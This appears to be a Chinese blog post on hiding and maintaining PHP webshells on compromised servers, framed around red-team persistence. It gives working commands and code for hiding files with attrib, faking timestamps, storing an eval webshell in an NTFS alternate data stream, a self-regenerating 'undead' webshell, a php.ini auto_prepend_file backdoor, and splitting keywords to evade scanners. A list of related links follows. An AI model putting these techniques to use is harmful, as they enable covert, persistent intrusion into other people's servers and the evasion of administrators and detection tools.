mdb文件取消隐藏_webshellphp隐藏技巧
在红蓝对抗中,我们在拿下一个服务器之后该如何让权限维持的久一些而不被管理员轻易的发现 ,除了Webshell要免杀,还需要注意一些隐藏技巧,因此就要在我们上传的木马动点手脚想办法不被管理员以及检测工具快速的发现。
0x01 Attrib隐藏文件
使用Attrib +s +a +h +r命令就是把原本的文件夹增加了系统文件属性、存档文件属性、只读文件属性和隐藏文件属性。
参数说明:
+r 设置只读属性-r 取消只读属性+a 设置存档属性-a 取消存档属性+s 设置系统属性-s 取消系统属性+h 设置隐藏属性-h 取消隐藏属性/s 显示目录下所有文件的属性/d 将attrib和任意命令行选项应用到目录
执行完命令后当前目录下的文件即隐藏,即使开启了显示隐藏的文件或是dir都是看不见的
attrib +s +a +h +r shell.php //隐藏shell.php文件
![](/assets/blank.gif)
0x02 修改文件时间属性
当你试图在一堆文件中隐藏自己新创建的文件,那么,除了创建一个迷惑性的文件名,还需要修改文件的修改日期。
Set-ItemProperty -Path 2.txt LastWriteTime -Value "2020-11-01 12:12:12" //修改时间修改
Set-ItemProperty -Path 2.txt LastAccessTime -Value "2020-11-01 12:12:12" //访问时间修改
Set-ItemProperty -Path 2.txt CreationTime -Value "2020-11-01 12:12:12" //创建时间修改
![](/assets/blank.gif)
使用命令获取文件属性:
Get-ItemProperty -Path D:\1.dll | Format-list -Property * -Force
修改某个文件夹下所有文件的创建和修改时间:
powershell.exe -command "ls 'test\*.*' | foreach-object { $_.LastWriteTime = Get-Date ; $_.CreationTime = '2077/01/01 19:00:00' }"
0x03 利用ADS隐藏文件内容
通过在命令行中echo一个数据流从而创建一个ADS隐藏文件
echo ^<?php @eval($_POST['chopper']);?^> > mm.php:shell.jpg
![](/assets/blank.gif)
我们只能看见一个index.php文件,且内容为空,常规的文件管理器、type命令,dir命令、del命令发现都找不出那个shell.jpg的。通过命令行输入完整的文件名即可通过notepad进行编辑,可以看到我们echo进去的一句话木马。
虽然我们已经将文件隐藏了,但是木马并不能够起作用,这里就需要用到文件包含,利用include函数,mm.php:shell.jpg进行hex编码,把这个ADS文件include进去,这样子就可以正常解析我们的一句话了。
<?php @include(PACK('H*','6D6D2E7068703A7368656C6C2E6A7067'));?>
0x04 不死马
<?php set_time_limit(0); ignore_user_abort(1); unlink(__FILE__); //删除自身while(1){ file_put_contents('shell.php','<?php @eval($_GET[cmd]);?>'); //创建shell.php,这里最好用免杀的一句话 sleep(10); //间隔时间}?>
在每次删除后的10秒钟之后又会重新生成一个新的shell.php文件,若要彻底删除文件最好的方法是将web服务停止了再删除。
0x05 php.ini
php.ini 中可以指定在主文件执行前后自动解析的文件名称,常用于页面公共头部和尾部,也可以用来隐藏php后门。
;在PHP文档之前自动添加文件。auto_prepend_file = "c:\tmp.txt";在PHP文档之后自动添加文件。auto_prepend_file = "c:\tmp.txt"
访问任意一个php文件即可获取webshell。
0x06 关键字拆分与文件包含
1.php内容:
<?php $a=$_POST['x'];?>
2.php内容:
<?php include "1.php";@eval($a);?>
直接访问2.php即可获取webshell
mdb文件取消隐藏_webshellphp隐藏技巧相关推荐
- Windows下各个盘中的文件夹属性变为隐藏,怎么取消隐藏属性
文件夹变为隐藏,网上好多是说中病毒导致,病毒修改了文件夹属性.但博主是因为内存条崩掉,导致系统对硬盘内容进行了保护,所以文件夹属性变为隐藏. 1. 查看隐藏的文件夹或文件 打开文件资源管理器(此电脑) ...
- php后门隐藏与维持技巧,PHP后门隐藏与维持技巧,php后门技巧_PHP教程
PHP后门隐藏与维持技巧,php后门技巧 在一个成功的测试后,通常会想让特权保持的更久些.留后门的工作就显得至关重要,通常布设的后门包括但不限于数据库权限,WEB权限,系统用户权限等等.此文则对大众后 ...
- 分析21个 Qt隐藏功能和技巧
分析21个 Qt 隐藏功能和技巧是本文将要介绍的内容,一一详细的罗列出来,以方便大家阅读方便. Q_GADGET:不需要从QObject继承就可以使用Qt的Meta Object功能 Q_ENUMS: ...
- 某剧院有33排座位java_行测备考资料:数量关系深处隐藏的整除技巧
原标题:行测备考资料:数量关系深处隐藏的整除技巧 数量关系中,整除思想的常规运用其实大家并不陌生,比如:文字直接描述整除:题干中出现"平均"."每"." ...
- Word隐藏回车符技巧
每一次在Word中敲击回车时,都会留下一个回车符,回车次数多了回车符也就跟着变多了,这的确是太影响视觉效果了,我们要如何操作才能将这些回车符去掉呢?特意为大家献上Word2003和Word2007中隐 ...
- 计算机如何把文件设为隐藏,电脑的文件、文件夹如何设置隐藏和显示?
日常生活中我们的电脑经常会需要去隐藏一些不能被别人看到的东西,比如一些重要的文件,那么电脑的文件.文件夹如何设置隐藏和显示?下面我们一起来看看吧! 方法/步骤 1.好了,我们开始新建一个文件夹,如图, ...
- mac出现文件夹问号_Macbook文件夹怎么设置隐藏或显示?开机带问号的文件夹怎么办?...
时代变了,笔记本电脑竞争也激烈.笔记本电脑每年都变得功能更强大,更薄,更好.然后是平板电脑,它们比笔记本电脑更便携,更便宜,并且有时性能更好.下面小编就为大家介绍一下Macbook文件夹怎么设置隐藏或 ...
- 文件隐藏软件,6种保护文件方式,实现隐藏并锁定
今天推荐的是一款强大的文件隐藏工具,总共有6种保护文件的方式:不保护.隐藏.锁定.只读.隐藏并锁定以及密码.首先咱们需要设置一个主密码. 使用时直接拖拽要处理的文件夹到软件中,就会实现隐藏并锁定. 咱 ...
- 苹果手机计算机的使用技巧,iPhone自带的计算器也太好用了吧!隐藏的小技巧很多人都不知道!...
原标题:iPhone自带的计算器也太好用了吧!隐藏的小技巧很多人都不知道! 用iPhone手机的朋友,你用过iPhone自带的计算器吗? 教授身边有很多苹果用户觉得iPhone手机上自带的计算器APP ...
最新文章
- 管理“我的右上角” : 介绍菜单栏图标软件 Bartender
- 台式计算机机箱都一样吗,别以为组装台式机很简单,机箱选择大有学问
- 绝地求生大逃杀,改配置
- 获取本地IP和mac等信息
- CentOS提示另一个目前运行的程序正在访问软件信息
- 不学Python的同学,“跳一跳”都输了
- Mac上MacVim安装与配置
- Java案例:泛型用法演示
- 提交数据库访问性能一些简单措施
- window打开IIS
- 有着 30 多年经验的程序员最终被辞退了
- 做游戏代理要找游戏源码平台
- 在线分析仪器(四)在线气体分析成套系统简述
- 【高等数学】微分方程
- 还没有表白神器?情人节来喽,快为心爱的她送上一份专属的礼物吧~
- 猿创征文 | Git的良心教程
- sakimichan网页版_PS笔刷推荐:光系、烟雾、铅笔、炭刷、油漆、涂鸦
- 【Vue】Vue打包文件后需要添加版本号Version,来防止更新后的页面有缓存
- 记一次服务器被植入木马/病毒:kdevtmpfsi
- 一位中科院自动化研究所博士的毕业论文致谢:求学22载,计算机终成一生的事业与希望...